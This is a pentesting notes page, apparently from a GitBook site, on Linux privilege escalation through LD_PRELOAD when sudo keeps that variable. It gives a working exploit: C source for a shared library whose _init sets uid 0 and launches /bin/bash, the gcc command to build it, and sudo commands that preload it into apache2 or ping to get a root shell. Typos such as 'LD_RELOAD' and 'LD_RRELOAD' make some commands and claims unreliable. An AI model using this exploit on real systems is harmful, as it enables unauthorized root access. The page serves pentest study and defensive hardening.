ld-reload

Static library denoted by .a extension and dynamic linked shared library denoted by .so extension. Programs do not have to compile a code/reinvent a wheel again and again, shared library have common function such as write a file, read a file, etc. You can reference a program to use shared library. You can find LD_RELOAD in /etc/sudoers

LD_PRELOAD environment variable can load a binary before executing a binary. The functions from the library are given preferences over the default ones.

If you found a binary that is allowed to run with sudo privilege and there is not entry in GTFOBINS.io, so you can still exploit it to get root shell.

Check sudo allowed binary - LD_PRELOAD Privilege Escalation

sudo -l

List the libraries use by a program

ldd /bin/ls

If a binary is found and it can be execute without password

Let's see how can we utilize the LD_PRELOAD environment variable to escalate variable. Let's assume that we have a service restart rights:

E.g.,

env_keep += LD_PRELOAD
(root) NOPASSWD: /usr/sbin/apache2 restart

This use has rights to restart the apache service as root, but it is not available in GTFOBin and /etc/sudoers entry is written specifying the absolute path, this could be used to escalate privileges under normal circumstances by exploiting LD_PRELOAD issue to run a custom shared library file.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Compile the above C code

gcc -fPIC -shared -o root.so root.c -nostartfiles

Exploit

sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

OR

sudo LD_RRELOAD=/tmp/shell.so /usr/bin/ping

Previousld-library-path Nextlinux-server-and-internal-enumeration

Last updated 1 day ago

hashtagCheck sudo allowed binary - LD_PRELOAD Privilege Escalation

hashtagList the libraries use by a program

Check sudo allowed binary - LD_PRELOAD Privilege Escalation

List the libraries use by a program